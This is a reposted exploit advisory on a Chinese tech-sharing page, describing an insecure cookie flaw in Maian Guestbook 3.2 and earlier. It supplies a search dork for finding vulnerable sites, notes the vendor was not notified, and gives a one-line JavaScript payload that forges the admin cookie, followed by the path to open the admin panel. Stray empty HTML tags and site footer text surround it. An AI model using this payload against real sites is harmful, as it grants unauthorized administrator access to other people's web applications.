<div id="7x91n"></div>
    <progress id="7x91n"><tr id="7x91n"><ruby id="7x91n"></ruby></tr></progress>

    <em id="7x91n"></em>
      <progress id="7x91n"></progress>

      <dl id="7x91n"><ins id="7x91n"></ins></dl>

          <div id="7x91n"></div>

          <dl id="7x91n"></dl>

          <dl id="7x91n"><ins id="7x91n"><thead id="7x91n"></thead></ins></dl>

            <div id="7x91n"><tr id="7x91n"></tr></div>

            <div id="7x91n"></div>
            <div id="7x91n"></div>
            <dl id="7x91n"></dl><dl id="7x91n"><ol id="7x91n"></ol></dl>
            首頁 > 系統服務 > 詳細

            Maian Guestbook

            時間:2016-01-02 09:51:17      閱讀:32313      評論:0      收藏:0      [點我收藏+]

            標簽:des   com   http   si   it   java   ha   io   as   

            -[*] ================================================================================ [*]-
            -[*] Maian Guestbook <= 3.2 Insecure Cookie Handling Vulnerability [*]-
            -[*] ================================================================================ [*]-



            [*] Discovered By: S.W.A.T.
            [*] E-Mail: svvateam[at]yahoo[dot]com
            [*] Script Download: http://www.maianscriptworld.co.uk
            [*] DORK: Powered by Maian Guestbook v3.2



            [*] Vendor Has Not Been Notified!



            [*] DESCRIPTION:

            Maian Guestbook suffers from a insecure cookie, the admin panel only checks if the

            cookie exists.
            and not the content. so we can easyily craft a cookie and look like a admin.



            [*] Vulnerability:

            javascript:document.cookie = "gbook_cookie=1; path=/";


            [*] NOTE/TIP:

            after running the javascript, visit "/admin/index.php" to view admin area.



            -[*] ================================================================================ [*]-
            -[*] Maian Guestbook <= 3.2 Insecure Cookie Handling Vulnerability [*]-
            -[*] ================================================================================ [*]-

            Maian Guestbook

            標簽:des   com   http   si   it   java   ha   io   as   

            原文:http://www.jb51.net/hack/5660.html

            (0)
            (0)
               
            舉報
            評論 一句話評論(0
            0條  
            登錄后才能評論!
            ? 2014 bubuko.com 版權所有 魯ICP備09046678號-4
            打開技術之扣,分享程序人生!
                         

            魯公網安備 37021202000002號

            福建省餐饮许可现场